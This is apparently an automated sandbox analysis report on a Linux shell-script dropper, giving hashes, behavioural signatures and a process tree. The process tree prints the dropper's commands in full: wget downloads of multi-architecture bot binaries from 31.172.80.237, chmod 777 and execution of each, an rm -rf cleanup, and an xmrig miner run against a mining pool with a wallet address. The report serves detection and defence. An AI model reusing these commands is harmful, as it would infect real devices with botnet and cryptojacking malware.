Analysis
- max time kernel: 95s
- max time network: 96s
- platform: debian-9_armhf
- resource: debian9-armhf-20240418-en
- resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 09-11-2024 04:09
Static task: static1
Behavioral task: behavioral1
- Sample: tyo2831qq.sh
- Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
- Sample: tyo2831qq.sh
- Resource: debian9-armhf-20240418-en
Behavioral task: behavioral3
- Sample: tyo2831qq.sh
- Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
- Sample: tyo2831qq.sh
- Resource: debian9-mipsel-20240418-en
General
- Target: tyo2831qq.sh
- Size: 1KB
- MD5: e12d6a1166c4e290ed4ba39f96c780ad
- SHA1: 57038253b27c0312102758d25a77b5d1859cba3e
- SHA256: 5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
- SHA512: 276aabcf2037ad435a105ded3f3bfb8491fb391d5e1d49942d41774807c3f0b4e15d1ed18a57f0d783cd9aafee3ce1a96e561d3ee6da02b5d6c51fc579bb91ee
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTP, 12 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid, process):
    669 chmod
    679 chmod
    689 chmod
    702 chmod
    710 chmod
    745 chmod
    764 chmod
    659 chmod
    685 chmod
    693 chmod
    721 chmod
    729 chmod
- Executes dropped EXE (1 IoC)
  Processes (ioc, pid, process):
    /tmp/bots 671 bots
- Reads system routing table (1 TTP, 3 IoCs)
  Gets active network interfaces from /proc virtual filesystem.
  Processes (description, ioc, process):
    File opened for reading /proc/net/route tyo2831qq.arm7
    File opened for reading /proc/net/route tyo2831qq.arm6
    File opened for reading /proc/net/route tyo2831qq.ppc
- Reads system network configuration (1 TTP, 3 IoCs)
  Uses contents of /proc filesystem to enumerate network settings.
  Processes (description, ioc, process):
    File opened for reading /proc/net/route tyo2831qq.ppc
    File opened for reading /proc/net/route tyo2831qq.arm7
    File opened for reading /proc/net/route tyo2831qq.arm6
- System Network Configuration Discovery (1 TTP, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes (pid, process):
    645 wget
    661 tyo2831qq.mips
    756 rm
- Writes file to tmp directory (11 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description, ioc, process):
    File opened for modification /tmp/tyo2831qq.mpsl wget
    File opened for modification /tmp/tyo2831qq.ppc wget
    File opened for modification /tmp/tyo2831qq.i586 wget
    File opened for modification /tmp/tyo2831qq.arm7 wget
    File opened for modification /tmp/tyo2831qq.mips wget
    File opened for modification /tmp/tyo2831qq.sh4 wget
    File opened for modification /tmp/tyo2831qq.x86 wget
    File opened for modification /tmp/tyo2831qq.arm6 wget
    File opened for modification /tmp/tyo2831qq.x32 wget
    File opened for modification /tmp/tyo2831qq.m68k wget
    File opened for modification /tmp/bots wget
Processes
Format: image (PID): command line; matched signatures on the following line. Indentation shows the process tree depth.
- /tmp/tyo2831qq.sh (PID 643): /tmp/tyo2831qq.sh
  - /usr/bin/wget (PID 645): wget http://31.172.80.237/tyo2831qq.mips
    signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /bin/chmod (PID 659): chmod 777 tyo2831qq.mips
    signatures: File and Directory Permissions Modification
  - /tmp/tyo2831qq.mips (PID 661): ./tyo2831qq.mips
    signatures: System Network Configuration Discovery
  - /usr/bin/wget (PID 664): wget http://31.172.80.237/bots
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 669): chmod 777 bots
    signatures: File and Directory Permissions Modification
  - /tmp/bots (PID 671): ./bots
    signatures: Executes dropped EXE
  - /usr/bin/wget (PID 673): wget http://31.172.80.237/tyo2831qq.mpsl
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 679): chmod 777 tyo2831qq.mpsl
    signatures: File and Directory Permissions Modification
  - /tmp/tyo2831qq.mpsl (PID 680): ./tyo2831qq.mpsl
  - /usr/bin/wget (PID 683): wget http://31.172.80.237/tyo2831qq.sh4
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 685): chmod 777 tyo2831qq.sh4
    signatures: File and Directory Permissions Modification
  - /tmp/tyo2831qq.sh4 (PID 686): ./tyo2831qq.sh4
  - /usr/bin/wget (PID 688): wget http://31.172.80.237/tyo2831qq.x86
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 689): chmod 777 tyo2831qq.x86
    signatures: File and Directory Permissions Modification
  - /tmp/tyo2831qq.x86 (PID 690): ./tyo2831qq.x86
  - /usr/bin/wget (PID 692): wget http://31.172.80.237/tyo2831qq.arm6
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 693): chmod 777 tyo2831qq.arm6
    signatures: File and Directory Permissions Modification
  - /tmp/tyo2831qq.arm6 (PID 694): ./tyo2831qq.arm6
    signatures: Reads system routing table; Reads system network configuration
  - /usr/bin/wget (PID 697): wget http://31.172.80.237/tyo2831qq.x32
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 702): chmod 777 tyo2831qq.x32
    signatures: File and Directory Permissions Modification
  - /tmp/tyo2831qq.x32 (PID 703): ./tyo2831qq.x32
  - /usr/bin/wget (PID 705): wget http://31.172.80.237/tyo2831qq.ppc
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 710): chmod 777 tyo2831qq.ppc
    signatures: File and Directory Permissions Modification
  - /tmp/tyo2831qq.ppc (PID 712): ./tyo2831qq.ppc
    signatures: Reads system routing table; Reads system network configuration
  - /usr/bin/wget (PID 715): wget http://31.172.80.237/tyo2831qq.i586
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 721): chmod 777 tyo2831qq.i586
    signatures: File and Directory Permissions Modification
  - /tmp/tyo2831qq.i586 (PID 722): ./tyo2831qq.i586
  - /usr/bin/wget (PID 724): wget http://31.172.80.237/tyo2831qq.m68k
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 729): chmod 777 tyo2831qq.m68k
    signatures: File and Directory Permissions Modification
  - /tmp/tyo2831qq.m68k (PID 731): ./tyo2831qq.m68k
  - /usr/bin/wget (PID 734): wget http://31.172.80.237/tyo2831qq.spc
  - /usr/bin/wget (PID 737): wget http://31.172.80.237/tyo2831qq.arm4
  - /usr/bin/wget (PID 740): wget http://31.172.80.237/tyo2831qq.arm7
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 745): chmod 777 tyo2831qq.arm7
    signatures: File and Directory Permissions Modification
  - /tmp/tyo2831qq.arm7 (PID 747): ./tyo2831qq.arm7
    signatures: Reads system routing table; Reads system network configuration
  - /usr/bin/wget (PID 750): wget http://31.172.80.237/tyo2831qq.arm5
  - /bin/rm (PID 756): rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86
    signatures: System Network Configuration Discovery
  - /usr/bin/wget (PID 759): wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig
  - /bin/chmod (PID 764): chmod 777 xmrig
    signatures: File and Directory Permissions Modification
  - /tmp/xmrig (PID 765): ./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 16KB
- MD5: 2615e32f9e7b42b36ba1f3dd6f8f7e3c
- SHA1: 4286d999a1a76da1e68cb227e01de237ef5fcf68
- SHA256: e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
- SHA512: b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78